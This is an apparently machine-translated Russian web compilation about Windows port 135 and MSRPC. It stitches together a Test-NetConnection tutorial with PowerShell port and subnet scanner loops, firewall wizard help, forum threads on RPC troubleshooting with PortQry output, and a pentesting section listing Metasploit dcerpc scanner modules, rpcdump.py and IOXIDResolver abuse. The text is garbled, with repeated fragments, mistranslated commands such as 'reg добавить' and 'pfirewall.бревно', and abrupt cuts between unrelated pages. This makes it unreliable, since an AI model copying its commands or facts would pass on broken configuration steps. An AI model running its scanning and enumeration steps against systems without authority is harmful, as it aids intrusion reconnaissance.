0 (Windows 2012 R2, Windows 8.1 и выше) появился встроенный командлет для проверки сетевых соединений — Test-NetConnection. С помощью данного командлета вы можете проверить доступность удаленного сервера или сетевой службы на нем, блокировку TCP портов файерволами, проверить доступность по ICMP и маршрутизацию. По сути, командлет Test-NetConnection позволяет заменить сразу несколько привычных сетевых утилит: ping, traceroute, сканер TCP портов и т.д.
telnet msk-msg01.winitpro.ru 25. Но начиная с Windows 7 клиент telnet выделен в отдельный компонент, который нужно устанавливать отдельно.
Посмотрим, как выполнить аналогичное действие в PowerShell.Основное преимущество командлета Test-NetConnection – он уже входит в состав всех современных версий Windows и вам не нужно устанавливать его отдельно. Командлет входит в состав модуля NetTCPIP (начиная с PoSh v4.0).
TCP Port Ping: Использование Test-NetConnection для проверки открытых портов и доступности серверов
Проверим, открыт ли порт TCP 25 (SMTP протокол) на почтовом сервере с помощью Test-NetConnection:
Test-NetConnection -ComputerName msk-msg01 -Port 25
Примечание. С помощью командлета Test-NetConnection можно проверить только TCP соединение, для проверки доступности UDP портов он не применим.
В сокращенном виде аналогичная команда выглядит так:
TNC msk-mail1 -Port 25
Разберем результат команды:
ComputerName : msk-msg01 RemoteAddress : 10.10.1.7 RemotePort : 25 InterfaceAlias : CORP SourceAddress : 10.
10.1.70
PingSucceeded : True
PingReplyDetails (RTT) : 0 ms
TcpTestSucceeded : True
Как вы видите, командлет выполняет разрешение имени сервера в IP адрес, выполняется проверка ответа ICMP (аналог ping) и доступность TCP порта. Указанный сервер доступен по ICMP (PingSucceeded = True) и 25 TCP порт также отвечает (RemotePort=25, TcpTestSucceeded= True).
У командлета есть специальный параметр –CommonTCPPort, позволяющий указать наименование известного сетевого протокола (HTTP, RDP, SMB, WINRM).
Например, чтобы проверить доступность веб-сервера, можно использовать команду:
Test-NetConnection -ComputerName winitpro.ru -CommonTCPPort HTTP
Или доступность RDP порта (3389):
Test-NetConnection msk-rds1 –CommonTCPPort RDP
Можно вывести все параметры, которые возвращает командлет Test-NetConnection:
Test-NetConnection msk-man01 -port 445|Format-List *
Если нужна только информация по доступности TCP порта, в более лаконичном виде проверка может быть выполнена так:
TNC msk-mail1 -Port 25 -InformationLevel Quiet
Командлет вернул True, значит удаленный порт доступен.
(New-Object System.Net.Sockets.TcpClient).Connect(‘msk-msg01’, 25)
В Windows 10/ Windows Server 2016 вы можете использовать командлет Test-NetConnection для трассировки маршрута до удаленного сервера при помощи параметра –TraceRoute (аналог tracert). С помощью параметра –Hops можно ограничить максимальное количество хопов при проверке.
Test-NetConnection msk-man01 –TraceRoute
Командлет вернул сетевую задержку при доступе к серверу в милисекундах (PingReplyDetails (RTT) : 41 ms) и все IP адреса маршрутизаторов на пути до целевого сервера.
Test-NetConnection в скриптах мониторинга
Следующая команда позволить проверить доступность определенного порта на множестве серверов, список которых хранится в текстовом файле servers.
txt. Нас интересуют сервера, где искомая служба не отвечает:
Get-Content c:\Distr\servers.txt | where { -NOT (Test-Netconnection $_ -Port 25 -InformationLevel Quiet)}| Format-Table –AutoSize
Аналогичным образом вы можете создать простейшую систему мониторинга, которая проверяет доступность серверов и выводит уведомление, если один из серверов недоступен.
Например, вы можете проверить доступность основных служб на всех контроллеров домена (список DC можно получить командлетом Get-ADDomainController). Проверим следующие службы на DC (в утилите PortQry есть аналогичное правило Domain and trusts):
- RPC – TCP/135
- LDAP – TCP/389
- LDAP – TCP/3268
- DNS – TCP/53
- Kerberos – TCP/88
- SMB – TCP/445
$Ports = "135","389","636","3268","53","88","445","3269", "80", "443"
$AllDCs = Get-ADDomainController -Filter * | Select-Object Hostname,Ipv4address,isGlobalCatalog,Site,Forest,OperatingSystem
ForEach($DC in $AllDCs)
{
Foreach ($P in $Ports){
$check=Test-NetConnection $DC -Port $P -WarningAction SilentlyContinue
If ($check.
tcpTestSucceeded -eq $true)
{Write-Host $DC.name $P -ForegroundColor Green -Separator " => "}
else
{Write-Host $DC.name $P -Separator " => " -ForegroundColor Red}
}
Скрипт проверит указанные TCP порты на контроллерах домена, и, если один из портов недоступен, выделит его красным цветом (с небольшими доработками можно запустить данный PowerShell скрипт как службу Windows).
Сканер сети на PowerShell
Также вы можете реализовать простой сканер портов и IP подсетей для сканирования удаленных серверов или подсетей на открытые/закрытые TCP порты.
Просканируем диапазон IP адресов на открытый порт 3389:
foreach ($ip in 5..30) {Test-NetConnection -Port 3389 -InformationLevel "Detailed" 10.10.10.$ip}
Просканируем диапазон TCP портов от 1 до 1024 на указанном сервере:
foreach ($port in 1..1024) {If (($a=Test-NetConnection srvfs01 -Port $port -WarningAction SilentlyContinue).tcpTestSucceeded -eq $true){ "TCP port $port is open!"}}
Мастер правил брандмауэра: страница «Протоколы и порты»
На этой странице мастера задаются сведения о том, какие
протоколы и порты, указываемые в сетевом пакете, удовлетворяют
данному правилу брандмауэра.
| Чтобы перейти к этой странице мастера |
-
В оснастке консоли MMC «Брандмауэр Windows в режиме повышенной безопасности» щелкните правой кнопкой мыши пункт Правила для входящих подключений или Правила для исходящих подключений и выберите команду Новое правило.
-
На странице Тип правила выберите Порт или Настраиваемый.
-
В мастере нажимайте кнопку Далее до тех пор, пока не дойдете до страницы Протокол и порты.
Выберите протокол, сетевой трафик которого необходимо
фильтровать с помощью данного правила брандмауэра. Если в списке
нет требуемого протокола, выберите Настраиваемый и введите
номер протокола в поле Номер протокола.
Если указываются протоколы TCP или UDP, то в полях Порт конечной точки 1 и Порт конечной точки 2 можно задать номера портов TCP или UDP.
Список протоколов, их портов и краткое описание см. в разделе библиотеки TechNet Страница свойств правила брандмауэра: Вкладка «Протоколы и порты» (http://go.microsoft.com/fwlink/?linkid=137823).
При выборе типа протокола соответствующий идентификационный номер протокола отображается в поле Номер протокола и доступен только для чтения. При выборе Настраиваемый для Типа протокола необходимо ввести идентификационный номер протокола в поле Номер протокола.
Используя протоколы TCP или UDP, можно задать локальный
порт, выбрав его в раскрывающемся списке или непосредственно задав
порт или список портов. Локальный порт — это порт компьютера, к
которому применяется профиль брандмауэра.
Для правил входящих подключений доступны следующие параметры:
- Все порты. Доступен для правил входящих и исходящих подключений по протоколам TCP и UDP. Выбор этого параметра указывает, что все порты для выбранного протокола удовлетворяют правилу.
- Определенные порты. Доступен для правил входящих и исходящих подключений по протоколам TCP и UDP. При выборе этого параметра разрешается ввод в текстовое поле требуемых номеров портов. Порты разделяются запятыми, диапазон портов указывается через дефис.
- Сопоставитель конечных точек RPC.
Доступен только для правил входящих подключений по протоколу TCP.
При выборе этого параметра локальный компьютер будет получать
входящие запросы RPC через порт TCP 135 для сопоставителя конечных
точек RPC (RPC-EM). В запросе к RPC-EM указывается сетевая служба и
запрашивается номер порта, по которому прослушивается указанная
сетевая служба. RPC-EM сообщает номер порта, на который удаленный
компьютер должен будет передавать сетевой трафик для данной службы.
Этот параметр также позволяет RPC-EM принимать RPC-запросы по
HTTP.
- Динамические порты RPC. Доступен
только для правил входящих подключений по протоколу TCP. При выборе
этого параметра локальный компьютер будет получать входящие сетевые
пакеты RPC через порты, назначенные средой выполнения RPC. Порты из
временного диапазона RPC блокируются брандмауэром Windows, если они
не были назначены исполняемым модулем RPC определенной сетевой
службе RPC. Только программа, которой исполняемым модулем RPC
назначен порт, может принимать входящий трафик через этот порт.
Важно! - При создании правил, разрешающих сетевой трафик RPC при помощи
параметров Сопоставитель конечных точек RPC и
Динамические порты RPC, разрешается весь сетевой трафик RPC.
Брандмауэр Windows не может фильтровать трафик RPC при помощи
идентификатора UUID целевой программы.
- Когда приложение использует RPC для взаимодействия от клиента к серверу, то обычно необходимо создать два правила — одно для сопоставителя конечных точек RPC, а другое для динамического RPC.
- При создании правил, разрешающих сетевой трафик RPC при помощи
параметров Сопоставитель конечных точек RPC и
Динамические порты RPC, разрешается весь сетевой трафик RPC.
- IPHTTPS. Доступен только для TCP. Доступен в разделе Локальный порт только для правил входящих подключений. При выборе этого параметра локальному компьютеру разрешается принимать входящие пакеты IPTHTTPS от удаленного компьютера. IPHTTPS является протоколом туннелирования, который поддерживает внедрение пакетов IPv6 в сетевые пакеты IPv4 HTTPS. Это позволяет трафику IPv6 проходить через IP-прокси, которые не поддерживают IPv6 или некоторые другие технологии туннелирования IPv6, например Teredo или 6to4.
- Обход узлов. Доступен только для
правил входящих подключений по протоколу UDP. При выборе этого
параметра локальному компьютеру разрешается получать входящие
сетевые пакеты Teredo.
RPC-EM сообщает номер порта, на который удаленный
компьютер должен будет передавать сетевой трафик для данной службы.
Этот параметр также позволяет RPC-EM принимать RPC-запросы по
HTTP.
Брандмауэр Windows не может фильтровать трафик RPC при помощи
идентификатора UUID целевой программы.
При выборе этого
параметра локальному компьютеру разрешается получать входящие
сетевые пакеты Teredo.Используя протоколы типа TCP или UDP, можно задать локальный и удаленный порт, выбрав его в раскрывающемся списке или непосредственно введя номер порта или список портов. Удаленный порт — это порт на компьютере, пытающимся установить связь с другим компьютером, на котором применен профиль брандмауэра.
Для правил входящих подключений доступны следующие параметры:
- Все порты. Доступен для правил входящих и исходящих подключений по протоколам TCP и UDP. Выбор этого параметра указывает, что все порты для выбранного протокола удовлетворяют правилу.
- Определенные порты. Доступен для
правил входящих и исходящих подключений по протоколам TCP и UDP.
При выборе этого параметра разрешается ввод в текстовое поле
требуемых номеров портов. Порты разделяются запятыми, диапазон
портов указывается через дефис.
- IPHTTPS. Доступен только для TCP. Доступен в разделе Удаленный порт только для правил исходящих подключений. При выборе этого параметра локальному компьютеру разрешается посылать удаленному компьютеру исходящие пакеты IPTHTTPS. IPHTTPS является протоколом туннелирования, который поддерживает внедрение пакетов IPv6 в сетевые пакеты IPv4 HTTPS. Это позволяет трафику IPv6 проходить через IP-прокси, которые не поддерживают IPv6 или некоторые другие технологии туннелирования IPv6, например Teredo или 6to4.
Порты разделяются запятыми, диапазон
портов указывается через дефис.Если необходимо создать правило, которое будет разрешать или блокировать ICMP-пакеты, в списке Тип протокола выберите ICMPv4 или ICMPv6 и нажмите кнопку Настроить. Настроить эти параметры можно в диалоговом окне Настройка параметров ICMP.
После создания правила брандмауэра можно изменить эти
настройки в диалоговом окне Свойства правила брандмауэра.
Чтобы открыть это диалоговое окно, дважды щелкните правило в списке
Правила для входящих подключений или Правила для
исходящих подключений. Изменить эти настройки можно на вкладке
Протоколы и порты.
GRC | Администрация порта, для Интернет-порта 135
Порт 135, безусловно, не является портом, который должен быть или должен быть доступен для Интернета. Хакерские инструменты, такие как «epdump» (Endpoint Dump), могут немедленно идентифицировать каждый связанный с DCOM сервер / службу, работающую на хост-компьютере пользователя, и сопоставлять их с известными эксплойтами для этих служб.Любые машины, размещенные за NAT-маршрутизатором (любой типичный домашний или малый бизнес-маршрутизатор с широкополосным IP-совместным использованием), будут изначально безопасными.И любой хороший персональный программный брандмауэр также должен иметь возможность легко блокировать порт 135 от внешнего воздействия. Это то, что ты хочешь.
Кроме того, многие поставщики услуг Интернета, заботящиеся о безопасности, теперь блокируют порт 135 вместе с пресловутым «трио NetBIOS» портов (, 137–139, ).
Таким образом, даже без какой-либо вашей собственной проактивной безопасности вы можете обнаружить, что порт 135 был заблокирован и украден вашим интернет-провайдером от вашего имени.
Идем дальше: закрытие порта 135
Широкое распространение и незащищенность этого порта вызвали серьезную озабоченность среди компьютерных гуру.Это привело к нескольким подходам к выключению сервера Windows DCOM и окончательному закрытию порта 135. Хотя приложения могут быть «с поддержкой DCOM» или «с поддержкой DCOM», очень немногие из них, если таковые имеются, фактически зависят от наличия своих служб. Следовательно, обычно можно (и, как правило, желательно, если вам удобно делать такие вещи), выключить DCOM и закрыть порт 135 без каких-либо побочных эффектов. (Чем меньше вещей работает в системе Windows, тем меньше вещей потребляет оперативную память и замедляет работу всего остального.)
Если вам интересно взять под контроль и прекратить работу другой ненужной «службы» Windows, следующие ссылки предоставят вам необходимую информацию и инструкции:
ТОЛЬКО для бесстрашных экспертов См.
Первый вопрос на этой странице базы знаний Майкрософт в разделе «Общие проблемы безопасности COM: как включить или отключить DCOM?
Страница с разнообразной информацией о DCOM: http: // accs-net.com / smallfish / dcom.htm
Все содержимое этой страницы защищено авторским правом © 2008 Gibson Research Corporation.netbios — Какова последовательность портов Windows RPC 135, 137, 139 (и выше)? Что изменится с портом 145?
Эта статья в TechNet великолепна, я рекомендую вам добавить ее в закладки. В нем довольно подробно перечислены порты, используемые различными службами Windows.
В версиях Windows до Vista / 2008 NetBIOS использовалась для службы «RPC Locator», которая управляла базой данных службы имен RPC.Но в Vista / 2008 и последующих версиях служба RPC Locator больше не нужна или полезна. Это рудиментарно. С этого момента я буду говорить только о MSRPC в Vista / 2008 +.
Порты 137, 138 и 139 предназначены для NetBIOS, а , а не , необходимы для работы MSRPC.
Все порты, используемые RPC, следующие:
RPC EPM TCP 135
RPC через HTTPS TCP 593
SMB (для именованных каналов) TCP 445
Эфемерный диапазон, динамический *
Другие приложения, такие как шлюз удаленного рабочего стола, будут использовать RPC через прокси-сервер HTTP и использовать порт 443 и т. Д.
Хотя в статье, на которую я ссылался выше, перечислены порты NetBIOS, они являются устаревшими и не требуются для RPC, при условии, что вы можете получить разрешение имен с помощью других средств (DNS) и при условии, что сама удаленная служба не зависит от NetBIOS.
Порт 145 фиктивный. Он ни для чего не используется. Где бы вы ни слышали, что это «улучшает положение», это неправильно.
Basic MSRPC использует порты 135 и динамический диапазон с высокими номерами. Этот динамический диапазон с высокими номерами — это порты 1024-5000 в XP / 2003 и ниже и 49152-65535 в Vista / 2008 и выше.Вы также можете вызвать временные порты этого диапазона портов.
Вы можете определить собственный диапазон портов, если хотите, например:
reg добавить HKLM \ SOFTWARE \ Microsoft \ Rpc \ Internet / v Ports / t REG_MULTI_SZ / f / d 8000-9000
reg add HKLM \ SOFTWARE \ Microsoft \ Rpc \ Internet / v PortsInternetAvailable / t REG_SZ / f / d Y
reg add HKLM \ SOFTWARE \ Microsoft \ Rpc \ Internet / v UseInternetPorts / t REG_SZ / f / d Y
и / или
netsh int ipv4 set dynamicport tcp start = 8000 num = 1001
netsh int ipv4 установить динамический порт udp start = 8000 num = 1001
netsh int ipv6 установить динамический порт tcp start = 8000 num = 1001
netsh int ipv6 установить динамический порт udp start = 8000 num = 1001
TCP-порт 135 является сопоставителем конечных точек MSRPC.Вы можете привязаться к этому порту на удаленном компьютере анонимно и либо перечислить все службы (конечные точки), доступные на этом компьютере, либо запросить, на каком порту работает конкретная служба, если вы знаете, что ищете.
Позвольте мне показать вам пример запроса к RPC Enpoint Mapper:
C: \> PortQry.exe -n 192.168.1.1 -e 135
Запрос целевой системы называется:
192.168.1.1
Попытка преобразовать IP-адрес в имя ...
IP-адрес преобразован в host01.labs.myotherpcisacloud.com
запрос ...
TCP-порт 135 (служба epmap): ПРОСЛУШИВАНИЕ
Использование эфемерного порта источника
Запрос базы данных Endpoint Mapper ...
Ответ сервера:
UUID: d95afe70-a6d5-4259-822e-2c84da1ddb0d
ncacn_ip_tcp: 192.168.1.1 [49152]
UUID: 12345778-1234-abcd-ef00-0123456789ac
ncacn_np: 192.168.1.1 [\\ pipe \\ lsass]
UUID: 12345778-1234-abcd-ef00-0123456789ac
ncacn_ip_tcp: 192.168.1.1 [49159]
UUID: 6b5bdd1e-528c-422c-af8c-a4079be4fe48 API удаленного Fw
ncacn_ip_tcp: 192.168.1.1 [49158]
UUID: 367abb81-9844-35f1-ad32-98f038001003
ncacn_ip_tcp: 192.168.1.1 [49157]
UUID: 12345678-1234-abcd-ef00-0123456789ab
ncacn_ip_tcp: 192.168.1.1 [49155]
UUID: 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1
ncacn_ip_tcp: 192.168.1.1 [49155]
UUID: ae33069b-a2a8-46ee-a235-ddfd339be281
ncacn_ip_tcp: 192. 168.1.1 [49155]
UUID: 4a452661-8290-4b36-8fbe-7f4093a94978
ncacn_ip_tcp: 192.168.1.1 [49155]
UUID: 76f03f96-cdfd-44fc-a22c-64950a001209
ncacn_ip_tcp: 192.168.1.1 [49155]
UUID: 7f1343fe-50a9-4927-a778-0c5859517bac Служба DfsDs
ncacn_np: 192.168.1.1 [\\ PIPE \\ wkssvc]
UUID: 3473dd4d-2e88-4006-9cba-22570909dd10 WinHttp Auto-Proxy Service
ncacn_np: 192.168.1.1 [\\ PIPE \\ W32TIME_ALT]
UUID: 1ff70682-0a51-30e8-076d-740be8cee98b
ncacn_np: 192.168.1.1 [\\ PIPE \\ atsvc]
...
Всего найдено конечных точек: 50
==== Конец ответа на запрос сопоставителя конечных точек RPC ====
168.1.1 [49155]
UUID: 4a452661-8290-4b36-8fbe-7f4093a94978
ncacn_ip_tcp: 192.168.1.1 [49155]
UUID: 76f03f96-cdfd-44fc-a22c-64950a001209
ncacn_ip_tcp: 192.168.1.1 [49155]
UUID: 7f1343fe-50a9-4927-a778-0c5859517bac Служба DfsDs
ncacn_np: 192.168.1.1 [\\ PIPE \\ wkssvc]
UUID: 3473dd4d-2e88-4006-9cba-22570909dd10 WinHttp Auto-Proxy Service
ncacn_np: 192.168.1.1 [\\ PIPE \\ W32TIME_ALT]
UUID: 1ff70682-0a51-30e8-076d-740be8cee98b
ncacn_np: 192.168.1.1 [\\ PIPE \\ atsvc]
...
Всего найдено конечных точек: 50
==== Конец ответа на запрос сопоставителя конечных точек RPC ====
Вы заметите, что если вы выполните этот запрос на локальном компьютере, вы найдете гораздо больше конечных точек, чем если бы вы выполняли запрос с удаленного компьютера. Это связано с тем, что многие конечные точки RPC не доступны удаленно и используются только для локального межпроцессного взаимодействия.
Дополнительная литература: http: // technet.microsoft.com/en-us/library/cc738291(v=WS.
10).aspx
А также: https://www.myotherpcisacloud.com/post/2014/02/16/verifying-rpc-network-connectivity-like-a-boss.aspx
Контроллер домена— «Сервер RPC недоступен» — порт 135 показывает фильтрацию — НЕТ брандмауэра
Итак, у меня есть пара контроллеров домена 2003, у которых, похоже, есть проблемы с репликацией. После запуска netdiag, dcdiag я понял, что существует проблема RPC, поэтому я проверил соединение с помощью portqry.EXE. От DC2 до DC1 подключение к портам, связанным с доменом (ldap, RPC, DNS, Kerberos, …), кажется нормальным. Противоположное, похоже, не работает:
TCP-порт 135 (служба epmap): ФИЛЬТР
portqry.exe -n 10.6.8.35 -e 135 -p TCP завершает работу с кодом возврата 0x00000002.
TCP-порт 445 (служба microsoft-ds): ФИЛЬТР
portqry.exe -n 10.6.8.35 -e 445 -p TCP завершает работу с кодом возврата 0x00000002.
Wireshark также показывает, что DC1 принимает пакеты, но не отвечает обратно на DC2, поэтому DC2 выполняет повторную передачу.
Остальные порты в порядке:
TCP-порт 389 (служба ldap): ПРОСЛУШИВАНИЕ
UDP-порт 389 ПРОСЛУШАЕТ
TCP-порт 3268 (служба msft-gc): ПРОСЛУШИВАНИЕ
TCP-порт 53 (служба домена): ПРОСЛУШИВАНИЕ
UDP-порт 53 (служба домена): ПРОСЛУШИВАНИЕ
БрандмауэрWindows отключен на обоих серверах, и они находятся в одной подсети, поэтому другой внешний брандмауэр не блокирует трафик. Все службы, включая RPC, запущены и работают.
Netstat на DC2:
C: \ Documents and Settings \ Administrator> netstat -na | findstr 135
TCP 0.0.0.0: 135 0.0.0.0:0 ПРОСЛУШИВАНИЕ
TCP 10.6.8.35:135 10.6.8.35:1814 УСТАНОВЛЕНО
TCP 10.6.8.35:1814 10.6.8.35:135 УСТАНОВЛЕНО
C: \ Documents and Settings \ Administrator> netstat -na | findstr 445
TCP 0.0.0.0:445 0.0.0.0:0 ПРОСЛУШИВАНИЕ
UDP 0.0.0.0:445 *: *
Выполнение того же теста с portqry.exe на локальном хосте также не работает должным образом:
Запуск портала.exe -n 127. 0.0.1 -e 135 -p TCP ...
Запрос целевой системы называется:
127.0.0.1
Попытка преобразовать IP-адрес в имя ...
IP-адрес преобразован в adc.xxx.gr
запрос ...
TCP-порт 135 (служба epmap): ПРОСЛУШИВАНИЕ
Использование эфемерного порта источника
Запрос базы данных Endpoint Mapper ...
Ответ сервера:
RPC Endpoint Mapper не ответил
TCP-порт 135 отфильтрован
portqry.exe -n 127.0.0.1 -e 135 -p TCP завершает работу с кодом возврата 0x00000000.
0.0.1 -e 135 -p TCP ...
Запрос целевой системы называется:
127.0.0.1
Попытка преобразовать IP-адрес в имя ...
IP-адрес преобразован в adc.xxx.gr
запрос ...
TCP-порт 135 (служба epmap): ПРОСЛУШИВАНИЕ
Использование эфемерного порта источника
Запрос базы данных Endpoint Mapper ...
Ответ сервера:
RPC Endpoint Mapper не ответил
TCP-порт 135 отфильтрован
portqry.exe -n 127.0.0.1 -e 135 -p TCP завершает работу с кодом возврата 0x00000000.
windows 7 — RPC-соединение с фильтром без межсетевых экранов
У меня есть рабочая станция ( PC1 ), которая не может взаимодействовать с контроллером домена через RPC (TCP / 135).
C: \ PortQryV2> portqry.exe -n 192.168.1.1 -p tcp -o 135
Запрос целевой системы называется:
192.168.1.1
Попытка преобразовать IP-адрес в имя ...
IP-адрес преобразован в dc.domain.local
запрос ...
TCP-порт 135 <служба epmap>: ФИЛЬТР
Выполнение той же команды на другой рабочей станции ( PC2 ) в той же подсети и VLAN показывает LISTENING вместе со всеми конечными точками RPC сервера.
C: \> netsh int ipv4 показать динамический порт tcp
Протокол tcp Динамический диапазон портов
---------------------------------
Начальный порт: 49152
Количество портов: 16384
Динамический диапазон портов одинаков для PC1 и PC2 .
И PC1 , и PC2 работают под управлением Windows 7 Enterprise SP1.
Программное обеспечение McAfee Host Intrusion Prevention (HIPS) раньше устанавливалось на PC1 , но было удалено в процессе устранения неполадок. Он остается установленным на PC2 . И PC1 , и PC2 использовали одну и ту же политику HIPS.
Брандмауэр Windows в настоящее время отключен на PC1 .
C: \> netsh advfirewall показать все профили
Настройки профиля домена:
-------------------------------------------------- --------------------
Состояние ВЫКЛ.
Политика межсетевого экрана AllowInbound, AllowOutbound
LocalFirewallRules Нет (только в хранилище GPO)
LocalConSecRules Нет (только в хранилище GPO)
InboundUserNotification Включить
Отключение удаленного управления
UnicastResponseToMulticast Включить
Логирование:
Отключить LogAllowedConnections
Отключить LogDroppedConnections
Имя файла% systemroot% \ system32 \ LogFiles \ Firewall \ pfirewall. бревно
MaxFileSize 4096
Настройки личного профиля:
-------------------------------------------------- --------------------
Состояние ВЫКЛ.
Политика межсетевого экрана AllowInbound, AllowOutbound
LocalFirewallRules Нет (только в хранилище GPO)
LocalConSecRules Нет (только в хранилище GPO)
InboundUserNotification Включить
Отключение удаленного управления
UnicastResponseToMulticast Включить
Логирование:
Отключить LogAllowedConnections
Отключить LogDroppedConnections
Имя файла% systemroot% \ system32 \ LogFiles \ Firewall \ pfirewall.бревно
MaxFileSize 4096
Настройки публичного профиля:
-------------------------------------------------- --------------------
Состояние ВЫКЛ.
Политика межсетевого экрана AllowInbound, AllowOutbound
LocalFirewallRules Нет (только в хранилище GPO)
LocalConSecRules Нет (только в хранилище GPO)
InboundUserNotification Включить
Отключение удаленного управления
UnicastResponseToMulticast Включить
Логирование:
Отключить LogAllowedConnections
Отключить LogDroppedConnections
Имя файла% systemroot% \ system32 \ LogFiles \ Firewall \ pfirewall. бревно
MaxFileSize 4096
ОК.
бревно
MaxFileSize 4096
Настройки личного профиля:
-------------------------------------------------- --------------------
Состояние ВЫКЛ.
Политика межсетевого экрана AllowInbound, AllowOutbound
LocalFirewallRules Нет (только в хранилище GPO)
LocalConSecRules Нет (только в хранилище GPO)
InboundUserNotification Включить
Отключение удаленного управления
UnicastResponseToMulticast Включить
Логирование:
Отключить LogAllowedConnections
Отключить LogDroppedConnections
Имя файла% systemroot% \ system32 \ LogFiles \ Firewall \ pfirewall.бревно
MaxFileSize 4096
Настройки публичного профиля:
-------------------------------------------------- --------------------
Состояние ВЫКЛ.
Политика межсетевого экрана AllowInbound, AllowOutbound
LocalFirewallRules Нет (только в хранилище GPO)
LocalConSecRules Нет (только в хранилище GPO)
InboundUserNotification Включить
Отключение удаленного управления
UnicastResponseToMulticast Включить
Логирование:
Отключить LogAllowedConnections
Отключить LogDroppedConnections
Имя файла% systemroot% \ system32 \ LogFiles \ Firewall \ pfirewall.
бревно
MaxFileSize 4096
ОК.
Я захватил RPC-соединение от portqry.exe с помощью Wireshark и обнаружил, что TCP SYN DPU было отправлено, но ACK не было получено. TCP SYN был отправлен еще дважды, отображаясь в Wireshark как [TCP Retransmission] . Позже я зафиксировал ту же связь RPC на контроллере домена с помощью Wireshark. Я видел входящий TCP SYN , но не видел ответа SYN ACK .Это как если бы контроллер домена произвольно игнорировал только этот компьютер только на этом порту. Обратите внимание, что запросы Kerberos (UDP / 88) отлично работают с PC1 .
Я также попытался пересобрать стек TCP / IP на PC1 , но безрезультатно.
Есть идеи, что может помешать этому общению?
135, 593 — Pentesting MSRPC
Вызов удаленной процедуры Microsoft, также известный как вызов функции или вызов подпрограммы, — это протокол, который использует модель клиент-сервер, чтобы позволить одной программе запрашивать обслуживание у программы на другом компьютере.
без необходимости разбираться в деталях сети этого компьютера.MSRPC был первоначально получен из программного обеспечения с открытым исходным кодом, но был дополнительно разработан и защищен авторским правом Microsoft.
В зависимости от конфигурации хоста к сопоставителю конечных точек RPC можно получить доступ через TCP и UDP-порт 135, через SMB с нулевым сеансом или сеансом с аутентификацией (TCP 139 и 445), а также в качестве веб-службы, прослушивающей TCP-порт 593.
135 / tcp open msrpc Microsoft Windows RPC
Процесс MSRPC начинается на стороне клиента, при этом клиентское приложение вызывает локальную процедуру-заглушку вместо кода, реализующего эту процедуру.Код-заглушка клиента извлекает необходимые параметры из адресного пространства клиента и доставляет их в библиотеку времени выполнения клиента, которая затем переводит параметры в стандартный формат представления сетевых данных для передачи на сервер.
Затем клиентская заглушка вызывает функции в клиентской библиотеке времени выполнения RPC для отправки запроса и параметров на сервер. Если сервер расположен удаленно, библиотека времени выполнения указывает соответствующий транспортный протокол и механизм и передает RPC в сетевой стек для транспортировки на сервер.Отсюда: https://www.extrahop.com/resources/protocols/msrpc/
Изображение из книги « Оценка сетевой безопасности, 3-е издание »
Раздел извлечен из книги « Оценка сетевой безопасности 3-е издание «
Вы можете запросить службу локатора RPC и отдельные конечные точки RPC, чтобы каталогизировать интересные службы, работающие по TCP, UDP, HTTP и SMB (через именованные каналы).
Каждое значение IFID, полученное в ходе этого процесса, обозначает службу RPC (например,g., 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc — интерфейс Messenger).
D: \ rpctools> rpcdump [-p порт] 192.168.189.1
IfId: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
0002 Служба обмена сообщениями Аннотации
0002 -0000-0000-0000-000000000000 Привязка: ncadg_ip_udp: 192.168.189.1 [1028]
Вы можете получить доступ к службе локатора RPC, используя четыре последовательности протоколов:
ncacn_ip_tcp и ncadg_ip_udp (TCP и UDP-порт 135)
ncacn_np через именованный канал \ epmapper SMB)
ncacn_http (RPC через HTTP через TCP-порт 80, 593 и другие)
использовать вспомогательный / scanner / dcerpc / endpoint_mapper
использовать вспомогательный / сканер / dcerpc / скрытый вспомогательный
/ dcerpc / management
используйте вспомогательный / scanner / dcerpc / tcp_dcerpc_auditor
rpcdump. py -p 135
Обратите внимание, что из упомянутых опций все, кроме tcp_dcerpc_auditor могут быть выполнены только для против порт 135 .
Используя https://github. com/mubix/IOXIDResolver, из исследования Airbus, возможно злоупотребление методом ServerAlive2 внутри интерфейса IOXIDResolver .
Этот метод использовался для получения информации об интерфейсе в виде адреса IPv6 из HTB-блока APT . См. Здесь для записи APT 0xdf, он включает альтернативный метод с использованием rpcmap.py из Impacket с привязкой строки (см. Выше).
Ссылки:
rpcdump.exe из rpctools может взаимодействовать с этим портом.
TCP 135 — Информация о протоколе порта и предупреждение!
Ищете информацию о протоколе TCP 135 ? На этой странице будет предпринята попытка предоставить вам как можно больше информации о порте TCP-порта 135.
TCP-порт 135 может использовать определенный протокол для связи в зависимости от приложения. Протокол — это набор формализованных правил, объясняющих, как данные передаются по сети. Думайте об этом как о языке, на котором говорят между компьютерами, чтобы помочь им общаться более эффективно.
Протокол HTTP, например, определяет формат связи между интернет-браузерами и веб-сайтами. Другой пример — протокол IMAP, который определяет связь между почтовыми серверами IMAP и клиентами, или, наконец, протокол SSL, который устанавливает формат, используемый для зашифрованной связи.
TCP-порт 135
Вот что мы знаем о протоколе TCP Port 135 . Если у вас есть информация о TCP-порту 135, которая не отражена на этой странице, просто оставьте комментарий, и мы обновим нашу информацию.
ПОРТ 135 — Информация
Примечание: TCP-порт 135 использует протокол управления передачей. TCP — один из основных протоколов в сетях TCP / IP. В то время как протокол IP имеет дело только с пакетами, TCP позволяет двум хостам устанавливать соединение и обмениваться потоками данных.TCP гарантирует доставку данных, а также гарантирует, что пакеты будут доставлены через порт 135 в том же порядке, в котором они были отправлены. Гарантированная связь через порт 135 — ключевое различие между TCP и UDP. UDP-порт 135 не может гарантировать связь таким же образом, как TCP.
Поскольку порт 135 протокола TCP был помечен как вирус (красный цвет), это не означает, что вирус использует порт 135, но то, что троянец или вирус использовали этот порт в прошлом для связи.
TCP 135 — Заявление об ограничении ответственности
Мы делаем все возможное, чтобы предоставить вам точную информацию о PORT 135 и прилагаем все усилия, чтобы поддерживать нашу базу данных в актуальном состоянии.Это бесплатный сервис, точность которого не гарантируется. Мы делаем все возможное, чтобы исправить любые ошибки, и приветствуем отзывы!
Сетевые порты, используемые для связи для обнаружения — Документация для BMC Helix Discovery
В этом разделе описывается связь между BMC Helix Discovery Outpost и целями обнаружения. Он содержит следующие разделы:
Обнаружение базового устройства
